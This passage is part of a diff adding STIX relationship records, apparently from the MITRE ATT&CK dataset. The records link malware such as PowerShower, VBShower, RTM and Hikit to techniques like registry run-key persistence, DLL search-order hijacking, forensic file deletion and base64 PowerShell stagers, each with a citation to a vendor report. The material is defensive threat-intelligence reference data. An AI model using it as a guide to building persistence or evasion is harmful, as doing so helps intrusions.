+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "source_name": "Unit 42 Inception November 2018",
+ "url": "https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/",
+ "description": "Lancaster, T. (2018, November 5). Inception Attackers Target Europe with Year-old Office Vulnerability. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[PowerShower](https://attack.mitre.org/software/S0441) has collected system information on the infected host.(Citation: Unit 42 Inception November 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--175199ba-b8b8-467b-9010-a2f549abd957",
+ "type": "relationship",
+ "modified": "2020-05-12T15:18:44.161Z",
+ "created": "2020-05-08T19:27:12.538Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--53486bc7-7748-4716-8190-e4f1fde04c53",
+ "target_ref": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4",
+ "external_references": [
+ {
+ "source_name": "Unit 42 Inception November 2018",
+ "url": "https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/",
+ "description": "Lancaster, T. (2018, November 5). Inception Attackers Target Europe with Year-old Office Vulnerability. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[PowerShower](https://attack.mitre.org/software/S0441) has added a registry key so future powershell.exe instances are spawned off-screen by default, and has removed all registry entries that are left behind during the dropper process.(Citation: Unit 42 Inception November 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--a679be02-156a-4e02-bfa5-ce07b60d147b",
+ "type": "relationship",
+ "modified": "2020-05-12T15:18:44.163Z",
+ "created": "2020-05-08T19:27:12.540Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--53486bc7-7748-4716-8190-e4f1fde04c53",
+ "target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279",
+ "external_references": [
+ {
+ "source_name": "Unit 42 Inception November 2018",
+ "url": "https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/",
+ "description": "Lancaster, T. (2018, November 5). Inception Attackers Target Europe with Year-old Office Vulnerability. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[PowerShower](https://attack.mitre.org/software/S0441) sets up persistence with a Registry run key.(Citation: Unit 42 Inception November 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--79bae99a-8480-4857-834b-fa823adca4c6",
+ "type": "relationship",
+ "modified": "2020-05-12T15:18:44.209Z",
+ "created": "2020-05-08T19:27:12.568Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--ead23196-d7b6-4ce6-a124-4ab4b67d81bd",
+ "target_ref": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
+ "external_references": [
+ {
+ "source_name": "Kaspersky Cloud Atlas August 2019",
+ "url": "https://securelist.com/recent-cloud-atlas-activity/92016/",
+ "description": "GReAT. (2019, August 12). Recent Cloud Atlas activity. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[Inception](https://attack.mitre.org/groups/G0100) used a file hunting plugin to collect .txt, .pdf, .xls or .doc files from the infected host.(Citation: Kaspersky Cloud Atlas August 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--86079dc0-0c46-4068-a2f1-9422d81a03be",
+ "type": "relationship",
+ "modified": "2020-05-12T15:17:50.243Z",
+ "created": "2020-05-08T20:02:19.072Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--ead23196-d7b6-4ce6-a124-4ab4b67d81bd",
+ "target_ref": "malware--53486bc7-7748-4716-8190-e4f1fde04c53",
+ "external_references": [
+ {
+ "source_name": "Unit 42 Inception November 2018",
+ "url": "https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/",
+ "description": "Lancaster, T. (2018, November 5). Inception Attackers Target Europe with Year-old Office Vulnerability. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "(Citation: Unit 42 Inception November 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--69ab51f8-fce5-436e-86a9-5d33d2332439",
+ "type": "relationship",
+ "modified": "2020-05-12T15:18:44.211Z",
+ "created": "2020-05-08T20:02:19.640Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--53486bc7-7748-4716-8190-e4f1fde04c53",
+ "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0",
+ "external_references": [
+ {
+ "source_name": "Kaspersky Cloud Atlas August 2019",
+ "url": "https://securelist.com/recent-cloud-atlas-activity/92016/",
+ "description": "GReAT. (2019, August 12). Recent Cloud Atlas activity. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[PowerShower](https://attack.mitre.org/software/S0441) has the ability to identify the current Windows domain of the infected host.(Citation: Kaspersky Cloud Atlas August 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--aaf0545f-bb47-4796-b23e-4780f354add9",
+ "type": "relationship",
+ "modified": "2020-05-12T20:35:30.002Z",
+ "created": "2020-05-08T20:17:55.366Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--53486bc7-7748-4716-8190-e4f1fde04c53",
+ "target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104",
+ "external_references": [
+ {
+ "source_name": "Kaspersky Cloud Atlas August 2019",
+ "url": "https://securelist.com/recent-cloud-atlas-activity/92016/",
+ "description": "GReAT. (2019, August 12). Recent Cloud Atlas activity. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[PowerShower](https://attack.mitre.org/software/S0441) has the ability to identify the current user on the infected host.(Citation: Kaspersky Cloud Atlas August 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--c737cde1-271e-4f00-9692-3784e075c24d",
+ "type": "relationship",
+ "modified": "2020-05-08T20:17:55.397Z",
+ "created": "2020-05-08T20:17:55.396Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8caa18af-4758-4fd3-9600-e8af579e89ed",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "Kaspersky Cloud Atlas August 2019",
+ "url": "https://securelist.com/recent-cloud-atlas-activity/92016/",
+ "description": "GReAT. (2019, August 12). Recent Cloud Atlas activity. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[VBShower](https://attack.mitre.org/software/S0442) has the ability to download VBS files to the target computer.(Citation: Kaspersky Cloud Atlas August 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--fe3b8cb8-8ff1-4abf-ac98-ce31108e5bb5",
+ "type": "relationship",
+ "modified": "2020-05-12T12:46:57.152Z",
+ "created": "2020-05-08T20:55:28.723Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8caa18af-4758-4fd3-9600-e8af579e89ed",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "source_name": "Kaspersky Cloud Atlas August 2019",
+ "url": "https://securelist.com/recent-cloud-atlas-activity/92016/",
+ "description": "GReAT. (2019, August 12). Recent Cloud Atlas activity. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[VBShower](https://attack.mitre.org/software/S0442) has attempted to obtain a VBS script from command and control (C2) nodes over HTTP.(Citation: Kaspersky Cloud Atlas August 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--c1cf1113-db4a-406a-8178-32fa4311d5dc",
+ "type": "relationship",
+ "modified": "2020-05-08T20:55:28.740Z",
+ "created": "2020-05-08T20:55:28.740Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8caa18af-4758-4fd3-9600-e8af579e89ed",
+ "target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279",
+ "external_references": [
+ {
+ "source_name": "Kaspersky Cloud Atlas August 2019",
+ "url": "https://securelist.com/recent-cloud-atlas-activity/92016/",
+ "description": "GReAT. (2019, August 12). Recent Cloud Atlas activity. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[VBShower](https://attack.mitre.org/software/S0442) used HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\\\[a-f0-9A-F]{8} to maintain persistence.(Citation: Kaspersky Cloud Atlas August 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--9cf55e84-53d2-4ec9-aaed-1df38ea08af1",
+ "type": "relationship",
+ "modified": "2020-05-12T20:56:07.282Z",
+ "created": "2020-05-08T20:55:28.743Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8caa18af-4758-4fd3-9600-e8af579e89ed",
+ "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
+ "external_references": [
+ {
+ "source_name": "Kaspersky Cloud Atlas August 2019",
+ "url": "https://securelist.com/recent-cloud-atlas-activity/92016/",
+ "description": "GReAT. (2019, August 12). Recent Cloud Atlas activity. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[VBShower](https://attack.mitre.org/software/S0442) has attempted to complicate forensic analysis by deleting all the files contained in %APPDATA%\\..\\Local\\Temporary Internet Files\\Content.Word and %APPDATA%\\..\\Local Settings\\Temporary Internet Files\\Content.Word\\.(Citation: Kaspersky Cloud Atlas August 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--83384e31-d9c6-46a0-956f-ee28d7d0cb89",
+ "type": "relationship",
+ "modified": "2020-05-08T20:55:28.749Z",
+ "created": "2020-05-08T20:55:28.749Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--ead23196-d7b6-4ce6-a124-4ab4b67d81bd",
+ "target_ref": "malware--8caa18af-4758-4fd3-9600-e8af579e89ed",
+ "relationship_type": "uses",
+ "id": "relationship--9b049c1e-0074-460e-86d3-338a33727172",
+ "external_references": [
+ {
+ "source_name": "Kaspersky Cloud Atlas August 2019",
+ "url": "https://securelist.com/recent-cloud-atlas-activity/92016/",
+ "description": "GReAT. (2019, August 12). Recent Cloud Atlas activity. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "(Citation: Kaspersky Cloud Atlas August 2019)",
+ "type": "relationship",
+ "modified": "2020-05-08T20:58:45.034Z",
+ "created": "2020-05-08T20:57:03.988Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6b1b551c-d770-4f95-8cfc-3cd253c4c04e",
+ "target_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597",
+ "external_references": [
+ {
+ "source_name": "Talos Frankenstein June 2019",
+ "url": "https://blog.talosintelligence.com/2019/06/frankenstein-campaign.html",
+ "description": "Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[Frankenstein](https://attack.mitre.org/groups/G0101) has used spearphishing emails to send trojanized Microsoft Word documents.(Citation: Talos Frankenstein June 2019) ",
+ "relationship_type": "uses",
+ "id": "relationship--996847c0-9e6f-44e5-bed7-ee78af9cf17d",
+ "type": "relationship",
+ "modified": "2020-05-28T00:01:09.507Z",
+ "created": "2020-05-11T15:21:09.597Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6b1b551c-d770-4f95-8cfc-3cd253c4c04e",
+ "target_ref": "tool--3433a9e8-1c47-4320-b9bf-ed449061d1c3",
+ "external_references": [
+ {
+ "source_name": "Talos Frankenstein June 2019",
+ "url": "https://blog.talosintelligence.com/2019/06/frankenstein-campaign.html",
+ "description": "Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "(Citation: Talos Frankenstein June 2019) ",
+ "relationship_type": "uses",
+ "id": "relationship--42c0ba63-03d8-414d-8f42-2aa4c585ea03",
+ "type": "relationship",
+ "modified": "2020-05-11T15:21:09.608Z",
+ "created": "2020-05-11T15:21:09.608Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--c416b28c-103b-4df1-909e-78089a7e0e5f",
+ "target_ref": "attack-pattern--d742a578-d70e-4d0e-96a6-02a9c30204e6",
+ "external_references": [
+ {
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "source_name": "ESET RTM Feb 2017"
+ },
+ {
+ "source_name": "ESET Buhtrap and Buran April 2019",
+ "url": "https://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/",
+ "description": "ESET Research. (2019, April 30). Buhtrap backdoor and Buran ransomware distributed via major advertising platform. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[RTM](https://attack.mitre.org/groups/G0048) has distributed its malware via the RIG and SUNDOWN exploit kits, as well as online advertising network Yandex.Direct.(Citation: ESET RTM Feb 2017)(Citation: ESET Buhtrap and Buran April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--03e67769-31da-4a46-a5a6-1ccbdd0cf29f",
+ "type": "relationship",
+ "modified": "2020-05-12T22:13:17.037Z",
+ "created": "2020-05-11T16:57:30.447Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--c416b28c-103b-4df1-909e-78089a7e0e5f",
+ "target_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597",
+ "external_references": [
+ {
+ "source_name": "Group IB RTM August 2019",
+ "url": "https://www.group-ib.com/blog/rtm",
+ "description": "Skulkin, O. (2019, August 5). Following the RTM Forensic examination of a computer infected with a banking trojan. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[RTM](https://attack.mitre.org/groups/G0048) has used spearphishing attachments to distribute its malware.(Citation: Group IB RTM August 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--5f1493e8-65d8-474a-b6b7-c1311fc24d98",
+ "type": "relationship",
+ "modified": "2020-05-12T22:13:50.363Z",
+ "created": "2020-05-11T17:27:36.637Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--c416b28c-103b-4df1-909e-78089a7e0e5f",
+ "target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279",
+ "external_references": [
+ {
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "source_name": "ESET RTM Feb 2017"
+ },
+ {
+ "source_name": "Group IB RTM August 2019",
+ "url": "https://www.group-ib.com/blog/rtm",
+ "description": "Skulkin, O. (2019, August 5). Following the RTM Forensic examination of a computer infected with a banking trojan. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[RTM](https://attack.mitre.org/groups/G0048) has used Registry run keys to establish persistence for the [RTM](https://attack.mitre.org/software/S0148) Trojan and other tools, such as a modified version of TeamViewer remote desktop software.(Citation: ESET RTM Feb 2017)(Citation: Group IB RTM August 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--09381138-b93b-4b0d-b82d-c21d452ff514",
+ "type": "relationship",
+ "modified": "2020-05-12T22:13:50.406Z",
+ "created": "2020-05-11T17:51:01.565Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--95047f03-4811-4300-922e-1ba937d53a61",
+ "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
+ "external_references": [
+ {
+ "source_name": "FireEye HIKIT Rootkit Part 2",
+ "url": "https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-2.html",
+ "description": "Glyer, C., Kazanciyan, R. (2012, August 22). The \u201cHikit\u201d Rootkit: Advanced and Persistent Attack Techniques (Part 2). Retrieved May 4, 2020."
+ }
+ ],
+ "description": "[Hikit](https://attack.mitre.org/software/S0009) has the ability to create a remote shell and run given commands. (Citation: FireEye HIKIT Rootkit Part 2)",
+ "relationship_type": "uses",
+ "id": "relationship--667c86bd-54f8-4602-a94a-054195de2808",
+ "type": "relationship",
+ "modified": "2020-05-13T20:36:49.361Z",
+ "created": "2020-05-11T18:05:53.417Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--95047f03-4811-4300-922e-1ba937d53a61",
+ "target_ref": "attack-pattern--0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b",
+ "external_references": [
+ {
+ "url": "https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-1.html",
+ "description": "Glyer, C., Kazanciyan, R. (2012, August 20). The \u201cHikit\u201d Rootkit: Advanced and Persistent Attack Techniques (Part 1). Retrieved June 6, 2016.",
+ "source_name": "FireEye Hikit Rootkit"
+ },
+ {
+ "source_name": "FireEye HIKIT Rootkit Part 2",
+ "url": "https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-2.html",
+ "description": "Glyer, C., Kazanciyan, R. (2012, August 22). The \u201cHikit\u201d Rootkit: Advanced and Persistent Attack Techniques (Part 2). Retrieved May 4, 2020."
+ }
+ ],
+ "description": "[Hikit](https://attack.mitre.org/software/S0009) is a [Rootkit](https://attack.mitre.org/techniques/T1014) that has been used by [Axiom](https://attack.mitre.org/groups/G0001).(Citation: FireEye Hikit Rootkit) (Citation: FireEye HIKIT Rootkit Part 2) ",
+ "relationship_type": "uses",
+ "id": "relationship--aacb43b8-2d3a-40bc-9f7b-1acb5b2474f2",
+ "type": "relationship",
+ "modified": "2020-05-13T20:37:30.032Z",
+ "created": "2020-05-11T18:05:53.457Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--95047f03-4811-4300-922e-1ba937d53a61",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "source_name": "FireEye HIKIT Rootkit Part 2",
+ "url": "https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-2.html",
+ "description": "Glyer, C., Kazanciyan, R. (2012, August 22). The \u201cHikit\u201d Rootkit: Advanced and Persistent Attack Techniques (Part 2). Retrieved May 4, 2020."
+ }
+ ],
+ "description": "[Hikit](https://attack.mitre.org/software/S0009) has used HTTP for C2.(Citation: FireEye HIKIT Rootkit Part 2)",
+ "relationship_type": "uses",
+ "id": "relationship--8eac6ff8-7c47-4a81-94ad-e5844d2533f1",
+ "type": "relationship",
+ "modified": "2020-05-13T20:36:49.359Z",
+ "created": "2020-05-11T18:05:53.488Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--95047f03-4811-4300-922e-1ba937d53a61",
+ "target_ref": "attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34",
+ "external_references": [
+ {
+ "url": "https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-1.html",
+ "description": "Glyer, C., Kazanciyan, R. (2012, August 20). The \u201cHikit\u201d Rootkit: Advanced and Persistent Attack Techniques (Part 1). Retrieved June 6, 2016.",
+ "source_name": "FireEye Hikit Rootkit"
+ }
+ ],
+ "description": "[Hikit](https://attack.mitre.org/software/S0009) has used [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001) to load oci.dll as a persistence mechanism.(Citation: FireEye Hikit Rootkit)",
+ "relationship_type": "uses",
+ "id": "relationship--1ad315e2-1693-427a-9a04-a613bd0e2f22",
+ "type": "relationship",
+ "modified": "2020-05-13T20:37:30.053Z",
+ "created": "2020-05-11T18:05:53.513Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--c416b28c-103b-4df1-909e-78089a7e0e5f",
+ "target_ref": "attack-pattern--4061e78c-1284-44b4-9116-73e4ac3912f7",
+ "external_references": [
+ {
+ "source_name": "Group IB RTM August 2019",
+ "url": "https://www.group-ib.com/blog/rtm",
+ "description": "Skulkin, O. (2019, August 5). Following the RTM Forensic examination of a computer infected with a banking trojan. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[RTM](https://attack.mitre.org/groups/G0048) has used a modified version of TeamViewer and Remote Utilities for remote access.(Citation: Group IB RTM August 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--685a8409-db59-4ef3-b4de-786b87be8839",
+ "type": "relationship",
+ "modified": "2020-05-12T22:13:50.412Z",
+ "created": "2020-05-11T18:14:38.220Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--c416b28c-103b-4df1-909e-78089a7e0e5f",
+ "target_ref": "attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34",
+ "external_references": [
+ {
+ "source_name": "Group IB RTM August 2019",
+ "url": "https://www.group-ib.com/blog/rtm",
+ "description": "Skulkin, O. (2019, August 5). Following the RTM Forensic examination of a computer infected with a banking trojan. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[RTM](https://attack.mitre.org/groups/G0048) has used search order hijacking to force TeamViewer to load a malicious DLL.(Citation: Group IB RTM August 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--16dfd169-264f-410f-97bf-a1cdec20c50e",
+ "type": "relationship",
+ "modified": "2020-05-12T22:13:50.409Z",
+ "created": "2020-05-11T18:14:38.240Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
+ "target_ref": "attack-pattern--b18eae87-b469-4e14-b454-b171b416bc18",
+ "external_references": [
+ {
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "source_name": "ESET RTM Feb 2017"
+ }
+ ],
+ "description": "[RTM](https://attack.mitre.org/software/S0148) used Port 44443 for its VNC module.(Citation: ESET RTM Feb 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--b2848d62-76a1-465c-b12e-7dc3113e6bbe",
+ "type": "relationship",
+ "modified": "2020-05-12T22:13:17.034Z",
+ "created": "2020-05-11T18:33:34.341Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
+ "target_ref": "attack-pattern--4061e78c-1284-44b4-9116-73e4ac3912f7",
+ "external_references": [
+ {
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "source_name": "ESET RTM Feb 2017"
+ }
+ ],
+ "description": "[RTM](https://attack.mitre.org/software/S0148) has the capability to download a VNC module from command and control (C2).(Citation: ESET RTM Feb 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--14e8774f-a443-4065-b44d-5bb13b467c7c",
+ "type": "relationship",
+ "modified": "2020-05-12T22:13:17.179Z",
+ "created": "2020-05-11T18:33:34.506Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--c416b28c-103b-4df1-909e-78089a7e0e5f",
+ "target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "external_references": [
+ {
+ "source_name": "Group IB RTM August 2019",
+ "url": "https://www.group-ib.com/blog/rtm",
+ "description": "Skulkin, O. (2019, August 5). Following the RTM Forensic examination of a computer infected with a banking trojan. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[RTM](https://attack.mitre.org/groups/G0048) has attempted to lure victims into opening e-mail attachments to execute malicious code.(Citation: Group IB RTM August 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--1bf08293-5342-4736-b3a9-c1f160ad9c81",
+ "type": "relationship",
+ "modified": "2020-05-12T22:13:50.415Z",
+ "created": "2020-05-11T18:36:05.417Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6b1b551c-d770-4f95-8cfc-3cd253c4c04e",
+ "target_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736",
+ "external_references": [
+ {
+ "source_name": "Talos Frankenstein June 2019",
+ "url": "https://blog.talosintelligence.com/2019/06/frankenstein-campaign.html",
+ "description": "Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[Frankenstein](https://attack.mitre.org/groups/G0101) has used PowerShell to run a series of base64-encoded commands, that acted as a stager and enumerated hosts.(Citation: Talos Frankenstein June 2019)\t",
+ "relationship_type": "uses",
+ "id": "relationship--4e8e5997-1af2-4d33-b9d0-e193acbd691f",
+ "type": "relationship",
+ "modified": "2020-05-28T00:01:09.624Z",
+ "created": "2020-05-11T19:28:48.985Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6b1b551c-d770-4f95-8cfc-3cd253c4c04e",
+ "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
+ "external_references": [
+ {
+ "source_name": "Talos Frankenstein June 2019",
+ "url": "https://blog.talosintelligence.com/2019/06/frankenstein-campaign.html",
